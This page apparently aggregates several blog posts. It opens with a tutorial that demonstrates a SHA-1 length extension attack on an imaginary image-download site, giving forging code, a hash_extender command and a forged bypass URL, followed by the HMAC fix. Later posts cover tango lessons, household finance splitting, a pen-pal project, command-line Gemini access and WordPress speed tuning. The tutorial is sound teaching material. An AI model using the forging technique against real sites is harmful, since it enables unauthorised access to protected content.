This is a video version of my blog post, Length Extension Attack. In it, I talk through the theory of length extension attacks and demonstrate an SHA-1 length extension attack against an (imaginary) website.


This post is also available as an article. So if you'd rather read a conventional blog post of this content, you can!

This post is also available as a video. If you'd prefer to watch/listen to me talk about this topic, give it a look.

Prefer to watch/listen than read? There’s a vloggy/video version of this post in which I explain all the key concepts and demonstrate an SHA-1 length extension attack against an imaginary site.

I understood the concept of a length extension attack, and when/how I needed to mitigate one, for a long time before I truly understood why they worked. It took until work provided me an opportunity to play with one in practice (plus reading Ron Bowes’ excellent article on the subject) before I really grokked it.

Would you like to learn? I’ve put together a practical demo that you can try for yourself!

You can check out the code and run it using the instructions in the repository if you’d like to play along.



The site “Images R Us” will let you download images you’ve purchased, but not ones you haven’t. Links to the images are protected by a SHA-1 hash1, generated as follows:

When a “download” link is generated for a legitimate user, the algorithm produces a hash which is appended to the link. When the download link is clicked, the same process is followed and the calculated hash compared to the provided hash. If they differ, the input must have been tampered with and the request is rejected.

Without knowing the secret key – stored only on the server – it’s not possible for an attacker to generate a valid hash for URL parameters of the attacker’s choice. Or is it?

Changing download=free to download=valuable invalidates the hash, and the request is denied.

Actually, it is possible for an attacker to manipulate the parameters. To understand how, you must first understand a little about how SHA-1 and its siblings actually work:

The message to be hashed (SECRET_KEY + URL_PARAMS) is cut into blocks of a fixed size.2

In SHA-1, blocks are 512 bits long and the padding is a 1, followed by as many 0s as is necessary, leaving 64 bits at the end in which to specify the length of the original message in bits.

Looking at the final block in a given message, it’s apparent that there are two pieces of data that could produce exactly the same output for a given function:

Therefore, if we can manipulate the input of the message, and we know the length of the message, we can append to it. Bear that in mind as we move on to the other half of what makes this attack possible.
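To make the padding rule concrete, here's a minimal Python sketch of it. It isn't part of the demo repository, and the function name sha1_padding is my own invention; it simply builds the bytes that SHA-1 would add to a message of a given length, using the 16-byte secret and download=free data from this post's example.

```python
import struct

def sha1_padding(message_len: int) -> bytes:
    """Return the padding SHA-1 appends to a message of message_len bytes."""
    # A single 1 bit (0x80 as a whole byte), then 0s until only 8 bytes
    # of the current 64-byte block remain...
    zeros = (55 - message_len) % 64
    # ...then the message length in bits, as a 64-bit big-endian integer.
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", message_len * 8)

# Example from this post: a 16-byte secret followed by "download=free".
padding = sha1_padding(16 + len(b"download=free"))
print(len(padding), padding[-1:].hex())  # prints: 35 e8
```

Those 35 bytes (0x80, a run of zeros, and a final 0xe8 for the 232-bit length) are exactly the shape of padding an attacker has to reproduce by hand.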

“Images R Us” is implemented in PHP. In common with most server-side scripting languages, when PHP sees an HTTP query string full of key/value pairs, if a key is repeated then it overrides any earlier iterations of the same key.

The raw, unparsed string is still available if you need it, e.g. via $_SERVER['QUERY_STRING'] in PHP, where you’ll find the entire query string.

You could even implement your own query string handler that instead makes the first instance of each key the canonical one, if you really wanted.6

If only we could append a second download parameter after the download=free parameter in the query string at “Images R Us”, e.g. making it download=free&download=valuable! But we can’t: not without breaking the hash, which is calculated based on the entire query string (minus the &key=... bit).
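The "last one wins" behaviour is easy to see in miniature. This is a Python sketch that imitates how PHP fills $_GET rather than PHP itself, and the helper name last_value_wins is hypothetical:

```python
from urllib.parse import parse_qsl

def last_value_wins(query_string: str) -> dict:
    """Parse a query string so that a repeated key overrides earlier ones."""
    # parse_qsl yields (key, value) pairs in order; dict() keeps the last
    # value seen for each key, imitating how PHP populates $_GET.
    return dict(parse_qsl(query_string))

print(last_value_wins("download=free&download=valuable"))
# {'download': 'valuable'}
```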

But with our new knowledge, we can append to the input for SHA-1: first a padding string, then an extra block containing our payload (the variable we want to override and its new value). We can then calculate a hash for this new block using the known output of the old final block as the IV… and we’ve got everything we need to put the attack together.

We have a legitimate link with the query string download=free&key=ee1cce71179386ecd1f3784144c55bc5d763afcc. This tells us that somewhere on the server, this is what’s happening:

If we pad the string download=free with some special characters to replicate the padding that would otherwise be added to this final8 block, we can add a second block containing an overriding value of download, specifically &download=valuable. The first value of download=, which will be the word free followed by a stack of garbage padding characters, will be discarded.

And we can calculate the hash for this new block, and therefore the entire string, by using the known output from the previous block, like this:
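For the curious, the whole trick can be sketched in pure Python. This is an illustration written for this post rather than the code from the demo repository or from hash_extender: the function names are my own, and the secret in the usage lines is a made-up 16-byte value used only to check the forgery locally. The important part is that extend_sha1 never sees the secret, only its length.

```python
import hashlib
import struct

def _rotl(x, n):
    """Rotate a 32-bit integer left by n bits."""
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def sha1_compress(state, block):
    """Run SHA-1's compression function over one 64-byte block."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        temp = (_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF
        a, b, c, d, e = temp, a, _rotl(b, 30), c, d
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))

def sha1_padding(message_len):
    """Padding SHA-1 appends to a message of message_len bytes."""
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", message_len * 8)

def extend_sha1(known_digest_hex, known_data, secret_len, append):
    """Forge (data, digest) for secret + known_data + padding + append."""
    # The "glue" reproduces the padding the server added to the original.
    glue = sha1_padding(secret_len + len(known_data))
    forged_data = known_data + glue + append
    # Resume hashing from the known digest instead of SHA-1's usual IV.
    state = struct.unpack(">5I", bytes.fromhex(known_digest_hex))
    # The appended data starts on a block boundary; pad it as though the
    # whole (secret + forged_data) message had been hashed from scratch.
    tail = append + sha1_padding(secret_len + len(forged_data))
    for offset in range(0, len(tail), 64):
        state = sha1_compress(state, tail[offset:offset + 64])
    return forged_data, struct.pack(">5I", *state).hex()

# Local check with a hypothetical secret (the attacker only needs its length).
secret = b"0123456789abcdef"
legit = hashlib.sha1(secret + b"download=free").hexdigest()
data, signature = extend_sha1(legit, b"download=free", 16, b"&download=valuable")
print(hashlib.sha1(secret + data).hexdigest() == signature)
```

The final comparison plays the part of the server: it hashes the secret plus the forged data and checks the result against the forged signature.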

Of course, you’re not going to want to do all this by hand! But an understanding of why it works is important to being able to execute it properly. In the wild, exploitable implementations are rarely as tidy as this, and a solid comprehension of exactly what’s happening behind the scenes is far more-valuable than simply knowing which tool to run and what options to pass.

That said: you’ll want to find a tool you can run and know what options to pass to it! There are plenty of choices, but I’ve bundled one called hash_extender into my example, which will do the job pretty nicely:

$ docker exec hash_extender hash_extender \
    --format=sha1 \
    --data="download=free" \
    --secret=16 \
    --signature=ee1cce71179386ecd1f3784144c55bc5d763afcc \
    --append="&download=valuable" \
    --out-data-format=html

Type: sha1

Secret length: 16



New signature: 7b315dfdbebc98ebe696a5f62430070a1651631b

New string: download%3dfree%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8%26download%3dvaluable

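I’m telling hash_extender:

- which algorithm to use (sha1), which can usually be derived from the hash length,
- the existing data (download=free), so it can determine the length,
- the length of the secret (16 bytes), which I’ve guessed but could brute-force,
- the existing, valid signature (ee1cce71179386ecd1f3784144c55bc5d763afcc),
- the data I’d like to append (&download=valuable), and
- the format I’d like the output in: I find html the most-useful generally, but it’s got some encoding quirks that you need to be aware of!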

hash_extender outputs the new signature, which we can put into the key=... parameter, and the new string that replaces download=free, including the necessary padding to push into the next block and your new payload that follows.

Unfortunately it does over-encode a little: it’s encoded all the & and = (as %26 and %3d respectively), which isn’t what we wanted, so you need to convert them back. But eventually you end up with the URL:

http://localhost:8818/?download=free%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8&download=valuable&key=7b315dfdbebc98ebe696a5f62430070a1651631b.

And that’s how you can manipulate a hash-protected string without access to its salt (in some circumstances).

The correct way to fix the problem is by using an HMAC in place of a simple hash signature. Instead of calling sha1( SECRET_KEY . urldecode( $params ) ), the code should call hash_hmac( 'sha1', urldecode( $params ), SECRET_KEY ). HMACs are theoretically-immune to length extension attacks, so long as the output of the hash function used is functionally-random9.

Ideally, it should also use hash_equals( $validDownloadKey, $_GET['key'] ) rather than ===, to mitigate the possibility of a timing attack. But that’s another story.
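The same two fixes translate directly to other languages. Here's a rough Python equivalent using the standard library's hmac module; the key value and the function names sign and is_valid are placeholders of mine, not anything from the demo site.

```python
import hashlib
import hmac

# Placeholder only: stands in for the secret kept on the server.
SECRET_KEY = b"hypothetical-secret-key"

def sign(params: bytes) -> str:
    """Return the hex HMAC-SHA1 signature for the given parameters."""
    return hmac.new(SECRET_KEY, params, hashlib.sha1).hexdigest()

def is_valid(params: bytes, provided_key: str) -> bool:
    """Check a signature using a constant-time comparison."""
    expected = sign(params).encode("ascii")
    # compare_digest takes the same time wherever the first difference
    # falls, which is what blunts a timing attack.
    return hmac.compare_digest(expected, provided_key.encode("utf-8"))

key = sign(b"download=free")
print(is_valid(b"download=free", key))      # True
print(is_valid(b"download=valuable", key))  # False
```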

1 This attack isn’t SHA1-specific: it works just as well on many other popular hashing algorithms too.

2 SHA-1‘s blocks are 64 bytes long; other algorithms vary.

3 For SHA-1, the padding bits consist of a 1 followed by 0s, except the final 8 bytes are a big-endian number representing the length of the message.

4 SHA-1’s IV is 67452301 EFCDAB89 98BADCFE 10325476 C3D2E1F0, which you’ll observe is little-endian counting from 0 to F, then back from F to 0, then alternating between counting from 3 to 0 and C to F. It’s considered good practice when developing a new cryptographic system to ensure that the hard-coded cryptographic primitives are simple, logical, independently-discoverable numbers like simple sequences and well-known mathematical constants. This helps to prove that the inventor isn’t “hiding” something in there, e.g. a mathematical weakness that depends on a specific primitive for which they alone (they hope!) have pre-calculated an exploit. If that sounds paranoid, it’s worth knowing that there’s plenty of evidence that various spy agencies have deliberately done this, at various points: consider the widespread exposure of the BULLRUN programme and its likely influence on Dual EC DRBG.

5 The padding characters I’ve used aren’t accurate, just representative. But there’s the right number of them!

6 You shouldn’t do this: you’ll cause yourself many headaches in the long run. But you could.

7 It’s also not always obvious which inputs are included in hash generation and how they’re manipulated: if you’re actually using this technique adversarially, be prepared to do a little experimentation.

8 In this example, the hash operates over a single block, but the exact same principle applies regardless of the number of blocks.

9 Imagining the implementation of a nontrivial hashing algorithm, the predictability of whose output makes their HMAC vulnerable to a length extension attack, is left as an exercise for the reader.

Received my physical copy of Planets In The Wires today, and I must say it was really cool of Pagan Wanderer Lu to include one of Fred “Thickie” Holden’s famous Tension Sheets as a freebie.

I added a stupid feature to my blog.

On some posts, including this one, you can now send an “emoji reaction”. Y’know, for if you’re too lazy to write a comment.

The available reactions vary by post.

That is all.

Pagan Wanderer Lu‘s new album Planets In The Wires dropped today, and I just cried my eyes out at track 5 (The Frosted Pane).

It opens almost apologetically, like an explanation for the gap in new releases for most of the twenty-teens. But it quickly becomes a poetic exploration of a detached depression of a man trapped under the weight of the world. It’s sad, and beautiful, and relatable.

Lately, Ruth and I have been learning to dance Argentine Tango.

Let me tell you everything I know about tango1:

This adventure began, in theory at least, on my birthday in January. I’ve long expressed an interest in taking a dance class together, and so when Ruth pitched me a few options for a birthday gift, I jumped on the opportunity to learn tango. My knowledge of the dance was basically limited to what I’d seen in films and television, but it had always looked like such an amazing dance: careful, controlled… synchronised, sexy.

After shopping around for a bit, Ruth decided that the best approach was for us to do a “beginners” video course in the comfort of our living room, and then take a weekend getaway to do an “improvers” class.

After all, we’d definitely have time to complete the beginners’ course and get a lot of practice in before we had to take to the dance floor with a group of other “improvers”, right?2

Okay, let me try again to enumerate everything I actually know about tango3:

Ultimately, it was entirely our own fault we felt out-of-our-depth up in Edinburgh at the weekend. We tried to run before we could walk, or – to put it another way – to milonga before we could caminar.

A somewhat-rushed video course and a little practice on carpet in your living room is not a substitute for a more-thorough práctica on a proper-sized dance floor, no matter how often you and your partner use any excuse of coming together (in the kitchen, in an elevator, etc.) to embrace and walk a couple of steps! Getting a hang of the fluid connections and movement of tango requires time, and practice, and discipline.

But, not least because of our inexperience, we did learn a lot during our weekend’s deep-dive. We got to watch (and, briefly, partner with) some much better dancers and learned some advanced lessons that we’ll doubtless reflect back upon when we’re at the point of being ready for them. Because yes: we are continuing! Our next step is a Zoom-based lesson, and then we’re going to try to find a more-local group.

Also, we enjoyed the benefits of some one-on-one time with Jenny and Ricardo, the amazingly friendly and supportive teachers whose video course got us started and whose in-person event made us feel out of our depth (again: entirely our own fault).

If you’ve any interest whatsoever in learning to dance tango, I can wholeheartedly recommend Ricardo and Jenny Oria as teachers. They run courses in Edinburgh and occasionally elsewhere in the UK as well as providing online resources, and they’re the most amazingly supportive, friendly, and approachable pair imaginable!

Just… learn from my mistake and start with a beginner course if you’re a beginner, okay? 😬

1 I’m exaggerating how little I know for effect. But it might not be as much of an exaggeration as you’d hope.

2 We did not.

3 Still with a hint of sarcasm, though.

4 Tango’s progressive enough that it’s come to reject describing the roles in binary gendered terms, using “leader” and “follower” in place of what was once described as “man” and “woman”, respectively. This is great for improving access to pairs of dancers who don’t consist of a man and a woman, as well as those who simply don’t want to take dance roles imposed by their gender.

Almost a decade ago I shared a process that my domestic polyfamily and I had been using (by then, for around four years) to manage our household finances. That post isn’t really accurate any more, so it’s time for an update (there’s a link if you just want the updated spreadsheet):

For my examples below, assume a three-person family. I’m using unrealistic numbers for easy arithmetic.

We’ve never done things this way, but for completeness’ sake I’ll mention it: the simplest way that households can split their costs is by dividing them between the participants equally: if the family make a £60 shopping trip, £20 should be paid by each of Alice, Bob, and Chris.

My example above shows exactly why this might not be a smart choice: this model would have each participant contribute £833.33 over the course of the month, which is more than Chris earned. If this month is representative, then Chris will gradually burn through their savings and go broke, while Alice will put over a grand into her savings account every month!

We’re a bunch of leftie socialist types, and wanted to reflect our political outlook in our household finances, too. So rather than just splitting our costs equally between us, we initially implemented a means-assessment system based on the relative differences between our incomes. The thinking was that somebody that earns twice as much should contribute twice as much towards the costs of running the household.

Using our example family above, here’s how that might look:

By analogy: The “Income-Assessed” model is functionally equivalent to splitting each and every expense according to the participants’ incomes – e.g. if a £100 bill landed on their doormat, Alice would pay £57, Bob £29, and Chris £14 of it – but has the convenience that everybody just pays for things “as they go along” and then squares everything up when their paycheques come in.
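As a rough illustration of the arithmetic (a sketch, not our actual spreadsheet), here's the income-assessed calculation in Python. The incomes and month's spending below are assumed figures, picked only because they reproduce the £57/£29/£14 split of a £100 bill; the function names are mine.

```python
def split_bill(amount, incomes):
    """Split a single bill in proportion to each person's income."""
    total_income = sum(incomes.values())
    return {p: round(amount * inc / total_income, 2) for p, inc in incomes.items()}

def income_assessed_settlement(incomes, paid):
    """How much each person owes (+) or is owed (-) at month end."""
    fair_shares = split_bill(sum(paid.values()), incomes)
    return {p: round(fair_shares[p] - paid[p], 2) for p in incomes}

# Assumed figures, for illustration only.
incomes = {"Alice": 2000, "Bob": 1000, "Chris": 500}
paid = {"Alice": 1450, "Bob": 750, "Chris": 300}

print(split_bill(100, incomes))
# {'Alice': 57.14, 'Bob': 28.57, 'Chris': 14.29}
print(income_assessed_settlement(incomes, paid))
# {'Alice': -21.43, 'Bob': -35.71, 'Chris': 57.14}
```

With these made-up numbers Chris owes £57.14, which is shared between Alice and Bob because they paid more than their income-weighted share.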

Over time, our expenditures grew and changed and our incomes grew, but they didn’t do so in an entirely simple fashion, and we needed to make some tweaks to our income-assessed model of household finance contributions. For example:

Eventually, we came to see that what we were doing was trying to patch a partially-broken system, and tried something new!

In 2022, we transitioned to a same-residual system that attempts to share out our money in an even-more egalitarian way. Instead of each person contributing in accordance with their income, the model attempts to leave each person with the same average amount of disposable personal income at the end. The difference is most-profound where the relative incomes are most-diverse.

With the example family above, that would mean:

That’s a very different result than the Income-Assessed calculation came up with for the same family! Instead of Chris giving money to Alice and Bob, because those two contributed to household costs disproportionately highly for their relative incomes, Alice gives money to Bob and Chris, because their incomes (and expenditures) were much lower. Ignoring any non-household costs, all three would expect to have the same bank balance at the start of the month as at the end, after settlement.

By analogy: The “Same-Residual” model is functionally equivalent to having everybody’s salary paid into a shared bank account, out of which all household expenditures are paid, and at the end of the month everything that’s left in the bank account gets split equally between the participants.
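The shared-bank-account analogy can be sketched in a few lines of Python. Again the figures are assumptions made up for illustration rather than numbers from our spreadsheet, and same_residual_settlement is a name I've chosen for this example.

```python
def same_residual_settlement(incomes, paid):
    """How much each person pays out (+) or receives (-) so that
    everybody ends the month with the same amount left over."""
    people = list(incomes)
    # What would be left in a shared account, split equally.
    residual = (sum(incomes.values()) - sum(paid.values())) / len(people)
    # Each person keeps `residual`; anything above that is handed over.
    return {p: round(incomes[p] - paid[p] - residual, 2) for p in people}

# Assumed figures, for illustration only.
incomes = {"Alice": 2000, "Bob": 1000, "Chris": 500}
paid = {"Alice": 1450, "Bob": 750, "Chris": 300}

print(same_residual_settlement(incomes, paid))
# {'Alice': 216.67, 'Bob': -83.33, 'Chris': -133.33}
```

Here Alice hands over £216.67, split between Bob and Chris, and all three finish with the same £333.33 residual.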

We’ve made tweaks to this model, too, of course. For example: we’ve set a “target” residual and, where we spend little enough in a month that we would each be eligible for more than that, we instead sweep the excess into our family savings account. It’s a nice approach to help build up a savings reserve without feeling a pinch.

I’m sure our model will continue to evolve, as it has for the last decade and a half, but for now it seems stable, fair, and reasonable. Maybe it’ll work for your household too (whether or not you’re also a polyamorous family!): take a look at the spreadsheet in Google Drive and give it a go.



Semi-inspired by a similar project by Kev Quirk, I’ve got a project I want to run on my blog in 2024.

I want you to be my pen pal for a month. Get in touch by emailing penpals@danq.me or any other way you like and let’s do this!

I don’t know much about the people who read my blog, whether they’re ad-hoc visitors or regular followers1.

So here’s the plan: what I’m looking to do is fill a “dance card” of interesting people, with each of whom I’ll “pen pal” for a month.

The following month, I’ll blog about the experience: who I met, what I learned about them, what I learned about myself. Have a look below and see if there’s a slot for you: I’d love to chat to you about, well – anything!

Want in? Leave a comment, at-me on the Fediverse @dan@danq.me, fill my contact form, or just email penpals@danq.me. Okay; looks like I’ve got a full year of people to meet! Awesome!

| Penpal with… | …during… | …and blog in: | Notes: |
|---|---|---|---|
| Colin Walker | December 2023 | January 2024 | Colin’s announcement |
| Thom Denholm | January 2024 | February 2024 | |
| Ru | February 2024 | March 2024 | |
| Dr. Alex Bowyer | March 2024 | April 2024 | Agreement via LinkedIn |
| Roslyn Cook | April 2024 | May 2024 | |
| Garrett Coakley | May 2024 | June 2024 | |
| Derek Kedziora | June 2024 | July 2024 | |
| Aarón Fas | July 2024 | August 2024 | |
| Cal Desmond-Pearson | August 2024 | September 2024 | |
| Tyoma | September 2024 | October 2024 | |
| Farai | October 2024 | November 2024 | |
| Katie | November 2024 | December 2024 | Katie’s comment |

I’ll update this table as people get in touch.

You! If you’re reading this, you’re probably somebody I want to meet! But I’d be especially interested in penpalling with people who tick one or more of the following boxes:

If you read this far and didn’t email penpals@danq.me yet, go do that. I’m looking forward to hearing from you!

1 Not-knowing who reads my blog might come at least in part from the fact that I actively sabotage any plugin that might give me any analytics! One might say I’ve shot myself in the foot, there.

2 If we stay in touch afterwards that’s fine too, but it’s not essential.

3 I’m looking for longer-form, but slower, communication than you get via e.g. instant messengers and whatnot: a more “penpal” experience.

Kev Quirk, Colin Walker, and other cool kids I follow online made it sound fun to share your “lifestack” as we approach the end of 2023.

So here’s mine: my digital “everyday carry” list of the tools and services I routinely use:

Travelling around Edinburgh by tram this weekend, I kept being advertised the “ET app”.

I didn’t install the app, in case it was bundled with spyware.

After all, everybody my age knows: ET phones home.

How did I never think of accessing Gemini (the protocol) on my Gemini (portable computer) before today?

Of course, I recently rehomed my Gemini so instead I had to access Gemini on my Cosmo (Gemini’s successor), which isn’t nearly as cool.1

1 Still pretty cool though. Reminds me of using Lynx on my Psion 5mx last millennium…

A particular joy of the Gemini and Spartan protocols – and the Markdown-like syntax of Gemtext – is their simplicity.

Even without a browser, you can usually use everyday command-line tools that you might have installed already to access relatively human-readable content.

Here are a few different command-line options that should show you a copy of this blog post (made available via CapsulePress, of course):

Gemini communicates over a TLS-encrypted channel (like HTTPS), so we need to use a tool that speaks the language. Luckily: unless you’re on Windows you’ve probably got one installed already1.

This command takes the full gemini:// URL you’re looking for and the domain name it’s at. 1965 refers to the port number on which Gemini typically runs –

printf "gemini://danq.me/posts/gemini-without-a-browser\r\n" | openssl s_client -ign_eof -connect danq.me:1965

GnuTLS closes the connection when STDIN closes, so we use cat to keep it open. Note inclusion of --no-ca-verification to allow self-signed certificates (optionally add --tofu for trust-on-first-use support, per the spec).

{ printf "gemini://danq.me/posts/gemini-without-a-browser\r\n"; cat -; } | gnutls-cli --no-ca-verification danq.me:1965

Netcat reimplementation Ncat makes Gemini requests easy:

printf "gemini://danq.me/posts/gemini-without-a-browser\r\n" | ncat --ssl danq.me 1965
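If you'd rather script it, the same request is only a few lines of Python using the standard ssl and socket modules. Treat this as a sketch: the function names are my own, and (like --no-ca-verification above) it skips certificate verification so that self-signed capsules work, which you may not want outside of debugging.

```python
import socket
import ssl

def build_gemini_request(url: str) -> bytes:
    """A Gemini request is just the full URL followed by CRLF."""
    return url.encode("utf-8") + b"\r\n"

def fetch_gemini(url: str, host: str, port: int = 1965) -> bytes:
    """Send a Gemini request and return the raw response (header + body)."""
    context = ssl.create_default_context()
    # Assumption: accept self-signed certificates, as many capsules use them.
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    chunks = []
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(build_gemini_request(url))
            # The server closes the connection once the response is sent.
            while True:
                chunk = tls.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
    return b"".join(chunks)

# Usage (needs network access):
# print(fetch_gemini("gemini://danq.me/posts/gemini-without-a-browser",
#                    "danq.me").decode("utf-8", errors="replace"))
```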

Spartan is a little like “Gemini without TLS”, but it sports an even-more-lightweight request format which makes it especially easy to fudge requests2.

Note the use of cat to keep the connection open long enough to get a response, as we did for Gemini over GnuTLS.

{ printf "danq.me /posts/gemini-without-a-browser 0\r\n"; cat -; } | telnet danq.me 300

cURL supports the telnet protocol too, which means that it can be easily coerced into talking Spartan:

printf "danq.me /posts/gemini-without-a-browser 0\r\n" | curl telnet://danq.me:300

Because TLS support isn’t needed, this also works perfectly well with Netcat – just substitute nc/netcat or whatever your platform calls it in place of ncat:

printf "danq.me /posts/gemini-without-a-browser 0\r\n" | ncat danq.me 300
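A scripted Spartan request is simpler still, since it needs nothing beyond a plain socket. This Python sketch follows the request format used in the commands above (host, path, then the body length); the function names are assumptions of mine.

```python
import socket

def build_spartan_request(host: str, path: str, body: bytes = b"") -> bytes:
    """Request line is 'host path content-length' + CRLF, then any body."""
    return f"{host} {path} {len(body)}\r\n".encode("ascii") + body

def fetch_spartan(host: str, path: str, port: int = 300) -> bytes:
    """Send a Spartan request and return the raw response."""
    chunks = []
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(build_spartan_request(host, path))
        # Read until the server closes the connection.
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)

# Usage (needs network access):
# print(fetch_spartan("danq.me", "/posts/gemini-without-a-browser")
#       .decode("utf-8", errors="replace"))
```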

I hope these examples are useful to somebody debugging their capsule, someday.

1 You can still install one on Windows, of course, it’s just less-likely that your operating system came with such a command-line tool built-in

2 Note that the domain and path are separated in a Spartan request and followed by the size of the request payload body: zero in all of my examples

The Internet is full of guides on easily making your WordPress installation run fast. If you’re looking to speed up your WordPress site, you should go read those, not this.

Those guides often boil down to the same old tips:

This article is for people who aren’t afraid to go tinkering in their WordPress codebase to squeeze a little extra (real world!) performance.

It’s for people whose neverending quest for perfection is already well beyond the point of diminishing returns.

But mostly, it’s for people who want to gawp at me, the freak who actually did this stuff just to make his personal blog a tiny bit nippier without spending an extra penny on hosting.

Don’t start with the hard way. Exhaust all the easy solutions – or at least, make a conscious decision about which easy solutions to enact or reject – first. Only if you really want to get into the weeds should you actually try doing the things I propose here. They’re not for most sites, and they’re not for the faint of heart.

Performance is a tradeoff. Every performance improvement costs you something else: time, money, DX, UX, etc. What you choose to trade for performance gains depends on your priority of constituencies, which may differ from mine.4

This is not a recipe book. This won’t tell you what code to change or what commands to run. The right answers for your content will be different than the right answers for mine. Also: you shouldn’t change what you don’t understand! But I hope these tips will help you think about what questions you need to ask to make your site blazing fast.

Okay, let’s get started…

If there are plugins you can’t remove because you depend upon their functionality, and those plugins inject content (especially JavaScript) on the front-end… backstab them to undermine that functionality.

For example, if you want Jetpack’s backup and downtime monitoring features, but you don’t want it injecting random <link rel='stylesheet' id='...-jetpack-css' href='...' media='all' />’s (an extra stylesheet to download and parse) into your pages: find the add_filter hook it uses and remove_filter it in your theme5.



Remove wp_head() and manually reimplement the functionality you actually need. Insert your own joke about “Headless WordPress” here.

Better yet, remove wp_head() from your theme entirely6.

Now, instead of blocking the hooks you don’t want polluting your <head>, you’re specifically allowing only those you want. You’ll want to take care to get some semi-essential ones like <link rel="canonical" href="...">7.

Now most of your plugins are broken, but in exchange, your theme has reclaimed complete control over what gets sent to the user. You can select what content you actually want delivered, and deliver no more than that. It’s harder work for you, but your site becomes so much lighter.

The single biggest bottleneck to the user viewing a modern WordPress website is the JavaScript that needs to be downloaded, compiled, and executed before the page can be rendered. Most of that’s plugins, but even on a nearly-vanilla installation you might find a copy of jQuery (eww!) and some other files.

In step 1 you threw it all away, which is great… but I’m betting you were depending on some of that to make your site work? Let’s put it back, carefully and selectively, while minimising the impact on load time.

That means scripts should be loaded (a) low-down, and/or (b) marked defer (or, better yet, async), so they don’t block page rendering.





If you haven’t already, you might like to View Source on this page. Count my <script> tags. You’ll probably find just two of them: one external file marked async, and a second block right at the bottom.

The inline <script> in my footer.php wraps a single line of PHP, which looks a little like this: <?php echo implode("\n\n", apply_filters( 'danq_footer_js', [] ) ); ?>. Starting from an initially-empty array, each filter can add a snippet, and every item in the final array is written into the script tag. When I render anything that requires JavaScript, e.g. for 360° photography, I can just add to that array (keyed, to prevent duplicates when viewing an archive page). Thus, the relevant script gets added exclusively to the pages where it’s needed, not to the entire site.

The only inline script added to every page loads my service worker, which itself aims to optimise caching as well as providing limited “offline” functionality.

While you’re tweaking your JavaScript anyway, you might like to check that any suitable addEventListeners are set to passive mode. Especially if you’re doing anything with touch or mousewheel events, you can often increase the perceived performance of these interactions by not letting your custom code block the default browser behaviour.

Wait, what? That’s the opposite of what everybody else recommends. To understand why, you have to think about why people recommend a CDN in the first place. Their reasons are usually threefold:

Consider edge-caching your own content only if you think you need it, but ditch jsDelivr, cdnjs, Google Hosted Libraries etc.

Hell: if you can, ditch all JavaScript served from third-parties and slap a Content-Security-Policy: script-src 'self' header on your domain to dramatically reduce the entire attack surface of your site!8

There’s a magic number you need to know: 12kb. Because of some complicated but fascinating maths (and depending on how your hosting is configured), it can be significantly faster to initially load a web resource of up to 12kb than it is to load one of, say, 15kb. Also, for the same reason, loading a web resource of much less than 12kb might not be significantly faster than loading one only a little less than 12kb.

Exploit this by:

$ curl --compressed -so /dev/null -w "%{size_download}\n" https://danq.me/

10416
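If you'd like to check a page against the budget before it's deployed, something like this Python sketch gives a rough answer. It assumes gzip compression (your server might negotiate something else, e.g. Brotli, and will add response headers on top) and treats “12kb” as 12 × 1024 bytes; both are my assumptions, as are the function names.

```python
import gzip
import os

# Assumption: interpreting the "12kb" magic number as 12 KiB.
FIRST_ROUND_TRIP_BUDGET = 12 * 1024

def compressed_size(payload: bytes) -> int:
    """Size in bytes of the payload after gzip compression."""
    return len(gzip.compress(payload))

def fits_budget(payload: bytes, budget: int = FIRST_ROUND_TRIP_BUDGET) -> bool:
    """True if the compressed payload stays within the budget."""
    return compressed_size(payload) <= budget

html = b"<!DOCTYPE html><html><body>" + b"<p>Hello, world!</p>" * 500 + b"</body></html>"
print(compressed_size(html), fits_budget(html))
# Random bytes barely compress, so 20,000 of them blow the budget.
print(fits_budget(os.urandom(20000)))
```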

Again, this probably flies in the face of everything you were taught about performance. I’m sure you were told that you should <link> to your stylesheets so that they can be cached across page loads. But it turns out that if you can make your HTML and CSS small enough, the opposite is true and you should inline the stylesheet again: caching styles becomes almost irrelevant if you get all the content in a single round-trip anyway!

For extra credit, consider optimising your homepage’s CSS so it’s even smaller by excluding directives that only apply to non-homepage pages, and vice-versa. Assuming you’re using a preprocessor, this shouldn’t be too hard: at simplest, you can have a homepage.css and main.css, each derived from a set of source files some of which they share (reset/normalisation, typography, colours, whatever) and the rest which is specific only to that part of the site.

Can’t manage to get your HTML and CSS down below the magic number? Then at least ensure that your HTML alone weighs in at <12kb compressed and you’ll still get some of the benefits. If you’ve got the headroom, you can selectively include a <style> block containing only the most-crucial CSS, with a particular focus on any that results in layout shifts (e.g. anything that specifies the height: of otherwise dynamically-sized block elements, or that declares an element position: absolute or position: fixed). These kinds of changes are relatively computationally-expensive because they cause content to re-flow, so provide hints as soon as possible so that the browser can accommodate them.

We don’t really talk about content being “above the fold” like we used to, because the modern Web has such a diverse array of screen sizes and resolutions that doing so doesn’t make much sense.

But if loading your full page is still going to take multiple HTTP requests (scripts, images, fonts, whatever), you should still try to deliver the maximum possible value in the first round-trip. That means:

<img width="..." height="..." ...> or having them load as a background with background-size: cover or contain in a block sized with CSS delivered in the initial payload. This reduces layout shift, which mitigates the need for computationally-expensive content reflows.

